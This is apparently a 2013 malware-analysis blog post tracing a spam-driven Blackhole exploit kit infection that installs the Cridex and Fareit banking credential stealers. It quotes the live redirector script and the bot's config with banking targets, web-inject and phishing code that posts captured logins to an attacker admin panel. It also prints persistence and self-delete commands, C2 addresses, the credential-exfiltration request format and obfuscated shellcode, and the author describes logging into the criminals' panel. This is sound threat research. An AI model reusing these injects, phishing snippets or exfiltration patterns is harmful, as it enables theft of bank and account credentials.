Cridex + Fareit Infection Analysis - "dozakialko.ru:8080" A Credential Stealer Case
18 Jan 2013#MalwareMustDie!![NEW] Fri Jan 18 13:44:56 JST 2013
The New Infector Domain of dfudont.ru:8080 was detected & analyzed-->>[HERE]
PS: dfudont.ru:8080 was also using same payload (at this moment)The Background
Yesterday we found infection of spam which lead us to some url like below:h00p://www.piastraollare.com/upload.htmWe went down to analysis, but had no chance to blog it, just put scratch in twitter:
h00p://kompot.designcon.tmweb.ru/upload.htmToday I just read the infection report via Spam posted by Conrad of Dynamoo Blog here -->>[Dynamoo] & my heart was called to write down about the analysis payload details + what that malware actually does as per seen yesterday. People should know exactly what really the threat is. I took the second url to check:#MalwareMustDie Cridex Infection+all callbacks CnC +PanelPWD in a tweet (pic) cc @nullandnull You got Cridex callbacks twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) January 16, 2013--23:07:05-- h00p://kompot.designcon.tmweb.ru/upload.htmThat contains the javascript redirector to the blackhole exploit infector.
=> `upload.htm'
Resolving kompot.designcon.tmweb.ru... 176.57.216.3
Connecting to kompot.designcon.tmweb.ru|176.57.216.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 423 [text/html]
23:07:06 (14.16 MB/s) - `upload.htm' saved [423/423]<html>Accessing the url above to found the Blackhole Landing Page using the obfuscation code of PluginDetect 0.7.9 The obfuscation code looks like this: After I decoded it, the de-obfuscated script appeared -->>[PASTEBIN]I followed our own-made guide here -->>[MMD-GUIDE] to grab the exploit components & the payloads served by this infector, the infector details are so indentical (and so does the Bad Actors behind this too) so there's no need to describe it all over again. The components contains: 2(two) PDFs, 2(two) JARs, 2(two) SWFs exploiter & a payload. Below is the picture of the catches I tweeted including the infector url & landing page, the payload was detected by 2(two) AV products only:
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h2><b>Please wait a moment ... You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dozakialko.ru:8080/forum/links/column.php";}
</script>
. :For your convenience you can check the VT detection ration of each sample below: [infector] [landing-page] [PDF1] [PDF2] [JAR1] [JAR2/0day] [SWF1] [SWF2] [payload]#MalwareMustDie - Today's spam leading to h00p://dozakialko.ru:8080/forum/links/column.php (BHEK) infects Cridex/Fareit twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) January 16, 2013The Payload
This payload was saved in many names, the one I fetched was info.exe, the naming itself was actually set by the server during the download request processed, for instance you'll see the snipped download logs below:Resolving dozakialko.ru... seconds 0.00, 212.112.207.15, 89.111.176.125, 91.224.135.20The file looks like this:
Caching dozakialko.ru => 212.112.207.15 89.111.176.125 91.224.135.20
Connecting to dozakialko.ru|212.112.207.15|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php?qf=30:1n:1i:1i:33&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&y=1k&wf=x&xt=t HTTP/1.0
Referer: MalwareMustDie Knocking on your Doors..
Host: dozakialko.ru:8080
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 16:28:13 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Wed, 16 Jan 2013 16:28:14 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
01:28:21 (80.99 KB/s) - `info.exe' saved [197632/197632]Sections:This is Trojan Cridex, it is a plain PE that we can be reversed well if you would like to analyze it deeper. Just needs a bit surgery to remove the trailing chars like below:
.text 0x1000 0x1e7fc 126976
.rdata 0x20000 0xc578 53248
.data 0x2d000 0x3e80 12288
.rsrc 0x31000 0x1b4 4096
Entry Point...................: 0x2b0e
Virtual Address...............: 0x40370e
Compilation timedatestamp.....: 2012-10-14 00:30:11
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x0000370E
Trace Compiler................: Borland Delphi 3.0
Hexed:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 B2 69 F6 96 F6 08 98 C5 F6 08 98 C5 F6 08 98 C5 .i..............
0090 8F 29 9C C5 A5 08 98 C5 C0 2E 93 C5 49 08 98 C5 .)..........I...
00A0 8D 14 94 C5 7B 08 98 C5 F6 08 99 C5 C4 08 98 C5 ....{...........
00B0 78 00 C7 C5 CB 08 98 C5 99 17 9C C5 C3 08 98 C5 x...............
00C0 52 69 63 68 F6 08 98 C5 00 00 00 00 00 00 00 00 Rich............
00D0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00 ........PE..L...
00E0 93 07 7A 50 00 00 00 00 00 00 00 00 E0 00 03 01 ..zP............0x00F79B bbbb:This payload will do self-copy itself with the API:
0x00F8A7 bbbb:
0x00F8DF bbbb:
0x00F916 bbbb:
0x00F94A bbbb:
0x00F983 bbbb:
0x00F9BD bbbb:
0x00F9ED bbbb:
: :
0x010193 bbbbbbbbbbbbbbBbb
0x0101AE GbbbrcbbRbbbrcbbbbbbbbbbbbb"bb"L
0x0101D6 Obbb"cbbrbbb"cbbbbbbbbbbbbb"bb
0x0101FB bbtpbbb
0x010203 cbbBbbb2cbbbbbbbbbbbbb"bb
0x01023A bb"b3
0x01024E bbbb:CopyFileW(lpExistingFileName: "%path%\sample.exe",and using "%s" /c "%s" to run via CMD for self-execution:
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe"
, bFailIfExists: 0x0)%System%CMD.EXE /c %AppData%/KB00085031.exeAs per captured: The original malware payload files was deleted by the batch comands:@echo offDuring those process the below changes occured in registry:
del /F /Q /A "%S"
if exist "%S" goto R
del /F /Q /A "%S"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00085031.exeThe next thing happens is in %Temp% folder was dropped files w/size below:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 0D 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 36 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00Path: Size:And there were started the network activity to the below urls:
C:\Documents and Settings\User\Local Settings\Temp\exp1.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp2.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp3.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp4.tmp.exe 98,304h00p://84.22.100.108:8080With one of the captured communication is: (click to enlarge) Noted: The usage of the fake USER-AGENT below;
h00p://182.237.17.180:8080
h00p://221.143.48.6:8080
h00p://180.235.150.72:8080
h00p://64.76.19.236:8080
h00p://163.23.107.65:8080
h00p://59.90.221.6:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://74.207.237.170:8080
h00p://97.74.113.229:8080
h00p://193.68.82.68:8080
h00p://69.64.89.82:8080
h00p://77.58.193.43:8080
h00p://174.120.86.115:8080
h00p://94.20.30.91:8080
h00p://174.142.68.239:8080
h00p://87.229.26.138:8080
h00p://188.120.226.30:8080
h00p://78.28.120.32:8080
h00p://217.65.100.41:8080
h00p://81.93.250.157:8080
h00p://95.142.167.193:8080
h00p://109.230.229.250:8080
h00p://109.230.229.70:8080Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)The marked keywords are match to the reversed result of binary:// usage of the HTTP/1.0 and HTTP/1.1 commands handling:"The best part is, the protocol of the data sent in above network traffic is an encryption of this formats:
GET
POST
HTTP/1.0
HTTP/1.1
multipart/form-data
boundary=
Content-Disposition
name="
filename="
Content-Type
text/
Host
Referer
User-Agent
Authorization
Accept-Encoding
Content-Length
If-Modified-Since
If-None-Match
https
Transfer-Encoding
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html "// The sent time, user-agent via HTTPThe data was taken from below detected software:
<http time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<useragent><![CDATA[%%.%us]]></useragent>
<data><![CDATA[]]></data>
</http>
// Current time sent with url and data
<httpshot time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<data><![CDATA[]]></data>
</httpshot>
// FTP data...
<ftp time="%%%uu">
<server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user>
<pass><![CDATA[]]></pass>
</ftp>
// Mail POP3 data..
<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user><pass><![CDATA[]]></pass>
</pop3>
// Command lines...
<cmd id="%u">%u</cmd>
// Certification information...
<cert time="%u">
<pass><![CDATA[]]></pass>
<data><![CDATA[]]></data>
</cert>
// Internet explorer information
<ie time="%u">
<data><![CDATA[]]></data>
</ie>
// Case of firefox....
<ff time="%u">
<data>
<![CDATA[]]>
</data>
</ff>
// Case of "mm" = Macromedia?
<mm time="%u">
<data><![CDATA[]]></data>
</mm>
// Hashed message contains PC privacy info...
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
<header>
<unique>%%.%us</unique>
<version>%%u</version>
<system>%%u</system>
<network>%%u</network>
</header>
<data>
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
</data>
</message>Mozilla\Firefox\ProfilesFurthermore, the BOTNET commands also detected, reminds me of Zbot:
cookies.*
Macromedia
chrome.exe
firefox.exe
explorer.exesettingsSome crypto traces:
commands
hash
httpshots
formgrabber
redirects
bconnect
httpinjects
modify
pattern
replacement
conditions
actions
redirect
process
:(etc)CryptImportPublicKeyInfoIt was all result of the memory saved data of KB00085031.exe/Cridex.
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStoreWhere is "that" Trojan Fareit? What's that?
If we move on, in dropped files in %Temp% there is a malware called Fareit trojan.2013/01/17 02:38 98,304 exp4.tmp.exeJust before Cridex process stopped Fareit was executed: By the way the binary looks like this: This is the real deal, what the bad guys really want to implement our our PC. A genuine trojan of credential stealer, backdoor, phishing client. Binary looks like:
MD5: 6cccfd22d1694ce0a4a65c89604d998eSections:Seriously trying to fake itself:
.text 0x1000 0x10ae4 69632
.data 0x12000 0x1006c0 4096
.rsrc 0x113000 0x4334 20480
Compilation timedatestamp.....: 2003-09-22 02:08:51
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001296
Virtual Address...............: 0x401296
Hex:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 3B 3A 67 1A 7F 5B 09 49 7F 5B 09 49 7F 5B 09 49 ;:g..[.I.[.I.[.I
0090 76 23 8D 49 61 5B 09 49 76 23 9C 49 6F 5B 09 49 v#.Ia[.Iv#.Io[.I
00A0 76 23 9A 49 7C 5B 09 49 7F 5B 08 49 29 5B 09 49 v#.I|[.I.[.I)[.I
00B0 76 23 8A 49 1F 5B 09 49 76 23 9B 49 7E 5B 09 49 v#.I.[.Iv#.I~[.I
00C0 76 23 9D 49 7E 5B 09 49 76 23 98 49 7E 5B 09 49 v#.I~[.Iv#.I~[.I
00D0 52 69 63 68 7F 5B 09 49 50 45 00 00 4C 01 03 00 Rich.[.IPE..L...
00E0 B3 59 6E 3F 00 00 00 00 00 00 00 00 E0 00 03 01 .Yn?............
00F0 0B 01 08 00 00 10 01 00 00 10 01 00 00 00 00 00 ................
0100 96 12 00 00 00 10 00 00 00 20 01 00 00 00 40 00 ......... ....@.0x01642A MS Shell DlgAs a fake Microsoft Tools:
0x016492 &Restart
0x0164BE &Do Not Restart
0x0164E2 Dial-Up Networking Command Line
0x0165DE %2%3%4%5%6
0x0168EA 'entry' alone selects the entry in the phonebook dialog
0x01695C Dial-Up Networking
0x016B2C HDial-Up Networking provides Windows NT's PPP and SLIP protocol support.
0x016BBE XDial-Up Networking is currently uninstalled. Press 'Install' to install and configure.
0x016D02 WYou must shut down and restart your computer before the new settings will take effect.
0x016DB2 *Do you want to restart your computer now?
0x016E08 IYou must be logged on as an Administrator to install Dial-Up Networking.0x01701A CompanyNameSome parts that need to be cut before reversing..
0x017034 Microsoft Corporation
0x017066 FileDescription
0x017088 Security Configuration Wizard Viewer
0x0170DA FileVersion
0x0170F4 6.0.6001.18000 (longhorn_rtm.080118-1840)
0x01714E InternalName
0x017168 SCWViewer
0x017182 LegalCopyright
0x0171A2 Microsoft Corporation. All rights reserved.
0x017202 OriginalFilename
0x017224 SCWViewer.exe
0x017246 ProductName
0x017286 Operating System
0x0172B2 ProductVersion
0x0172D0 6.0.6001.180000x008E3C 0000000000000000000000000000000000000000You'll find the VT report in here --->>[VIRUS-TOTAL] What this trojan does is firstly downloading the config file from the CNC and save it into the registry. PoC? here: The huge data downloaded via HTTP from the remote host.. With the binary data below: This data will be saved in Registry as hex-binary below: If you take the hex and see it in the ASCII viewer will look like this: ↑This is what so-called Trojan Fareit's config, it is made to be executed when the Trojan Parfeit is activated in memory, it is in the tagged HTML-like formats. In the following section I will try to explain what's inside this config file.
0x009375 "000000000000000000000000000000000000000000000000000000000000000000000000000&
0x0096EF 00000000000000000000000000000000000000000000000000000000000000
0x009D92 ]00000000000000000000000000000000000
0x00A92B <0000000000000000F
0x00B1AE 0000000000000000000000000000000000000000000000000000
0x00B573 L00000000000000000000000000000000000000000000000000000000000000000
0x00B5DA 000000000000000000000000000000000000000000000000000000000000000000000000000000
0x00BE0F 00000000000000000Q
0x00C179 000000000000000000000000000000000000000000000000000000000000000000000AWhat was stolen?
That config file is explaining many things. Below is what was stolen..."cash & wires accounts"How the data to be passed:
<settings hash="e0014db74a7606d107a0b61e31f0d159334877e8">
<httpshots><url type="deny">\.(css|js)($|\?)</url>
<url contentType="^text/(html|plain)">\.com/k1/</url>
<url contentType="^text/(html|plain)">/ach/</url>
<url contentType="^text/(html|plain)">/authentication/zbf/k/</url>
<url contentType="^text/(html|plain)">/bb/logon/</url>
<url contentType="^text/(html|plain)">chase\.com</url>
<url contentType="^text/(html|plain)">/cashman/</url>
<url contentType="^text/(html|plain)">/cashplus/</url>
: : : :
<url contentType="^text/(html|plain)">achredirect\.aspx</url>
<url contentType="^text/(html|plain)">cbonline</url>
<url contentType="^text/(html|plain)">/ebc_ebc1961/</url>
<url contentType="^text/(html|plain)">/ibs\.</url>
<url contentType="^text/(html|plain)">/ibws/</url>
<url contentType="^text/(html|plain)">/icm/</url>
<url contentType="^text/(html|plain)">/icm2/</url>
<url contentType="^text/(html|plain)">/inets/</url>
<url contentType="^text/(html|plain)">/livewire/</url>
<url contentType="^text/(html|plain)">/loginolb/loginolb</url>
<url contentType="^text/(html|plain)">/netbnx/</url>
<url contentType="^text/(html|plain)">/olbb/</url>
<url contentType="^text/(html|plain)">/phcp</url>
<url contentType="^text/(html|plain)">/sbuser/</url>
<url contentType="^text/(html|plain)">/smallbiz/</url>
<url contentType="^text/(html|plain)">/wcmpw/</url>
<url contentType="^text/(html|plain)">/webcm/</url>
<url contentType="^text/(html|plain)">/wire/</url>
<url contentType="^text/(html|plain)">/wires/</url>
"online bankings..."
<url contentType="^text/(html|plain)">2checkout\・com</url>
<url contentType="^text/(html|plain)">ablv\・com</url>
<url contentType="^text/(html|plain)">access\・jpmorgan\.com</url>
<url contentType="^text/(html|plain)">access\.usbank\・com</url>
<url contentType="^text/(html|plain)">accessbankplc\・com</url>
<url contentType="^text/(html|plain)">accountoverview\.aspx</url>
<url contentType="^text/(html|plain)">accurint\.com</url>
<url contentType="^text/(html|plain)">achieveaccess\・citizensbank\.com</url>
<url contentType="^text/(html|plain)">achpayment</url>
<url contentType="^text/(html|plain)">achweb\.unionbank\.com</url>
<url contentType="^text/(html|plain)">achworks\・com</url>
<url contentType="^text/(html|plain)">alltimetreasury\.pacificcapitalbank\.com</url>
<url contentType="^text/(html|plain)">alphabank\・com</url>
<url contentType="^text/(html|plain)">amegybank\・com/</url>
<url contentType="^text/(html|plain)">anb\.portalvault\・com</url>
<url contentType="^text/(html|plain)">atbonlinebusiness\・com</url>
: : : :
<url contentType="^text/(html|plain)">westfield\.accounts\-in\-view\.com</url>
<url contentType="^text/(html|plain)">wiretransfer</url><
url contentType="^text/(html|plain)">wtdirect\.com</url>
</httpshots>
"SNS Accounts.."
<formgrabber>
<url type="deny">\.(swf)($|\?)</url>
<url type="deny">/isapi/ocget.dll</url>
<url type="allow">^https?://aol・com/.*/login/</url>
<url type="allow">^https?://accounts.google・com/ServiceLogin</url>
<url type="allow">^https?://login.yahoo・com/</url>
<url type="allow">^https?://login.live・com/</url>
<url type="deny">^https?://(\w+\.)?aol・com</url>
<url type="deny">^https?://(\w+\.)?facebook・com/</url>
<url type="deny">^https?://(\w+\.)?google</url>
<url type="deny">^https?://(\w+\.)?yahoo</url>
<url type="deny">^https?://(\w+\.)?youtube・com</url>
<url type="deny">^https?://(\w+\.)?live.com</url>
<url type="deny">^https?://(\w+\.)?twitter・com</url>
<url type="deny">^https?://(\w+\.)?vk・com</url>
<url type="allow">.*</url>
</formgrabber>"Redirecting data to POST.."How it was encrypted:
<redirect><pattern>jQuatro.js</pattern>
<process><![CDATA[http://62.76.177.123/mx/3A/in/cp.php?h=8]]></process>
</redirect></redirects>
"BOTNET Connection..."
<bconnect>85.143.166.72:443</bconnect>
<httpinjects><httpinject><conditions>"Encrypt the passwords...."A complete list of online banking site targets:
<replacement><![CDATA[
<script type='text/javascript'>
if(typeof window.EncryptPassword=='function')
{
var fn=window.EncryptPassword;
window.EncryptPassword=function(id)
{
try
{ var e=document・getElementById(id);
var i=document.createElement("input");
i.type="hidden";
i.name="OPN";
i.value=e.value;
document.Form1.appendChild(i);<url ...">^https://(www\.|)cashanalyzer\.com/</url>Below is the method to redirect into phishing sites...
<url ...">^https://(www\.|)enternetbank\.com/</url>
<url ...">^https://(www\.|)nashvillecitizensbank\.com/</url>
<url ...">^https://.*citizensbank\.com/</url>
<url ...">^https://.+\.firsttennessee\.com/</url>
<url ...">^https://.*firstcitizens\.com/</url>
<url ...">^https://(bolb\-(west|east)|www)\.associatedbank\.com/</url>
<url ...">^https://.*secure\.fundsxpress\.com/</url>
<url ...">^https://usgateway\d*\.rbs\.com/</url>
<url ...">^https://(www\.|)svbconnect\.com/</url>
<url ...">^https?://(www\d*\.|)(ntrs|northerntrust)\.com/</url>
<url ...">^https://cib\.bankofthewest\.com/</url>
<url ...">^https://.+\.unionbank\.com/</url>
<url ...">^https://webbankingforbusiness\.mandtbank\.com/</url>
<url ...">^https://ifxmanager\.bnymellon\.com/</url>
<url ...">^https://(ecash\.|.+/cashman/)</url>
<url ...">^https://banking\.calbanktrust\.com/</url>
<url ...">^https://.+/(wcmfd/wcmpw|phcp/servlet)/</url>
<url ...">^https://(www\.|)efirstbank\.com/</url>
<url ...">^https://singlepoint\.usbank\.com/</url>
<url ...">^https://business-eb\.ibanking-services\.com/</url>
<url ...">^https://www8\.comerica\.com/</url>
<url ...">^https://.+\.53\.com/</url>
<url ...">^https://businessonline\.tdbank\.com/</url>
<url ...">^https://treas-mgt\.frostbank\.com/</url>
<url ...">^https://.+\.huntington\.com/</url>
<url ...">^https://businessaccess\.citibank\.citigroup\.com/</url>
<url ...">^https://.+/cmserver/</url>
<url ...">^https://cashmanager\.mizuhoe-treasurer.com/</url>
<url ...">^https://wellsoffice\.wellsfargo\.com/</url>
<url ...">^https://.+/onlineserv/CM/</url>
<url ...">^https://.+/ebc_ebc1961/</url>
<url ...">^https://(www\.|)sterlingwires\.com/</url>
<url ...">^https://(www\.|)treasury\.pncbank\.com/</url>
<url ...">^https://securentrycorp\.</url>
<url ...">^https://.*ebanking-services\.com/</url>
<url ...">^https://bnycash\.bankofny\.com/</url>
<url ...">^https://(.+\.web\-access|webinfocus\.mandtbank)\.com/</url>
<url ...">^https://.*businessmanager\.com/</url>
<url ...">^https://businessportal\.mibank\.com</url>
<url ...">^https://.+/Common/SignOn/</url>
<url ...">^https://commercial\.wachovia\.com/Online/Financial/Business/</url>
<url ...">^https://.+\.blilk\.com/</url>
<url ...">^https://webcmpr\.bancopopular\.com/K1/</url>
<url ...">^https://trz\.tranzact\.org/</url>
<url ...">^https://.+\.tdcommercialbanking\.com/</url>
<url ...">^https://.+\.ffinonline\.com/</url>
<url ...">^https?://(www\.|)ffbtexas\.com/</url>
<url ...">^https?://.+\.bancosabadellmiami\.com/</url>
<url ...">^https://server\d+\.cey-ebanking\.com/CLKCCM/</url>
<url ...">^https://.+\.ffrontier\.com/</url>
<url ...">^https://.+\.rbsm\.com/</url>
<url ...">^https://.+\.firstmerit</url>
<url ...">^https://.+\.fcsolb\.com</url>
<url ...">^https://cs\.directnet\.com</url>
<url ...">^https://.+\.bankofcyprus\.com/</url>
<url ...">^https://www\.hellenicnetbanking\.com/</url>
<url ...">^https://www\.e\-moneyger\.com/</url>
<url ...">^https://.+\.anzdirect\.co\.nz/online/</url>
<url ...">^https://.+\.anz\.com/inetbank/</url>
<url ...">^https://.+\.bendigobank\.com\.au/</url>
<url ...">^https://ib\.nab\.com\.au/nabib/</url>
<url ...">^https://.+\.nabconnect\.nab\.com\.au/auth/login/</url>
<url ...">^https://.+\.commbiz\.commbank\.com\.au/</url>
<url ...">^https://compassconnect\.compassbank\.com/</url><replacement> <url contentType="^text/(html|plain)">^h00ps://direct.53・com/</url>Also aiming specific url accessed....
META HTTP-EQUIV="Refresh" CONTENT="0; URL=h00ps://express.53.com/express/logon・jsp<url ...><![CDATA[^h00ps://online\(.)americanexpress\(.)com/myca/.*?request_type=authreg_acctAccountSummary]]>You can contact me to see the config data extracted.
<url ...>h00ps://businessaccess\(.)citibank\.citigroup(.)com/cbusol/signon\.do</url>Phishing
You'll see these phishing codes....var info = encodeURIComponent('Login='+$('input#EmployerLogin1_cbsys_login_email').Some trails on the phishing forms.. Related to the phishing form there's a code for credit card fake processing..
val()+"\n"+'Password='+$('input#EmployerLogin1_cbsys_login_password').
val()+"\n"+$('input[name=q1]').
val()+'='+$('input[name=a1]').
val()+"\n"+$('input[name=q2]').
val()+'='+$('input[name=a2]').
val()+"\n"+$('input[name=q3]').
val()+'='+$('input[name=a3]').function check_cc(cardnumber) {
var cardNo = cardnumber.replace(/[^0-9]/g, "");
if (cardNo.length < 15 || cardNo.length > 16) {
return false;
}
var checksum = 0;
var j = 1;
var calc;
for (i = cardNo.length - 1; i >= 0; i--) {
calc = Number(cardNo.charAt(i)) * j;
if (calc > 9) {
checksum = checksum + 1;
calc = calc - 10;
}
checksum = checksum + calc;
if (j == 1) {
j = 2;
} else {
j = 1;
}
}
if (checksum % 10 != 0) {
return false;
}
return true; }What Software's Credential is Accessed?
Morever in memory, was found trailing path of credential detection:Common AppDataWith the complete list -->>[PASTEBIN]You'll see list of most of the softwares used internet using username and passwords were aimed; i.e.: Browsers, intranet tools, FTP, Plugins, and ..Mailer(POP/SMTP/IMAP).
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
HostName
User
:(etc)How Trojan Fareit Sent the Credentials?
How this credentials sent? In binary I detected HTTP POST method coded below:POST %s HTTP/1.0To the remote hosts below:
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}h00p://132.248.49.112:8080/asp/intro.phpWith the PoC I detected below: Be noted the usage of below USER-AGENT:
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.phpMozilla/4.0 (compatible; MSIE 5.0; Windows 98)The Control and Center Trails
It has the trail of Admin Panel for the Bad Actors to access.var adminPanelLocation = 'h00p://62.76.177.123/if_Career/';Which was used to send the phished information with formula below:var d = adminPanelLocation + 'gate.php?done=1&bid=%YOUR-PC-NAME%&info='+info+'&rkey=' + Math['random']();In the memory found the large combination of passwords for this panel, I posted some to the VT comment yesterday:
var d = adminPanelLocation + 'gate.php?bid=%YOUR-PC-NAME%&location='+encodeURIComponent(window.location)+'&rkey=' + Math['random']();phpbb asdf qazwsx iloveyou jordan pokemonFrankly, yesterday I happened to test accessed the site with some of the passwords and it worked, but today it looks like closed..
qwerty soccer happy shadow faith iloveyo
jesus superman matrix christ summer mustang
abc123 michael pass sunshine ashley helpme
letmein cheese aaaaaa master buster justin
test internet amanda computer heaven jasmine
love joshua nothing princess pepper orange
password1 fuckyou ginger tigger hunter testing
hello blessed mother football lovely apple
monkey baseball snoopy angel andrew michell
dragon starwars jessica jesus1 thomas peace
trustno1 purple welcome whatever angels secret
freedom charlie grace killer daniel william
jennifer :Research Materials
Here's the samples -->>[MEDIAFIRE]Please contact me via Twitter by mentioned to @MalwareMustDie for the research data.Additional: New Infector of dfudont.ru:8080
@unixfreaxjp /malware]$ date Fri Jan 18 13:44:56 JST 2013BHEK Landing page/PluginDetect
Downloads:--10:58:57--Obfuscated version landing page: The deobfuscated version is here -->>[HERE]
h00p://dfudont.ru:8080/forum/links/column.php
=> `column.php'
Resolving dfudont.ru... 89.111.176.125, 91.224.135.20, 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 117,545 70.64K/s
10:59:01 (70.51 KB/s) - `column.php' saved [117545]Some Changes in dfudont.ru:8080 infection
New shellcode in plugin detect:function getShellCode(){Some new modification, jar/java callback functions were spotted in PluginDetect:
var a = "
8282!%5154!%O415!%94eO!%a451!%eOa4!%9134!%c451!%74eO!%2191!%9124!%9121!%21b1!%9134!%3421!%
2191!%b1b1!%a121!%21b1!%9154!%3421!%2191!%a1e5!%d451!%eOO5!%b1b1!%1421!%2191!%9114!%6421!%
2191!%b181!%e451!%71a4!%O485!%6O85!%5464!%44d5!%b474!%b57O!%6434!%4414!%547O!%a5d5!%e474!%
817O!%81O1!%21O1!%a5d5!%c56O!%7464!%d5c4!%c4e4!%7O7O!%8521!%c5c5!%85O4!%237O!%15e1!%eee6!%
:
583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%Ofb2!%423a!%c7cO!%4c7d!%5ae6!%4236!%e43a!%b25f!%
67cO!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c5O2!%O1ad!%6983!%3f72!%deb1!%58b2!%964d!%
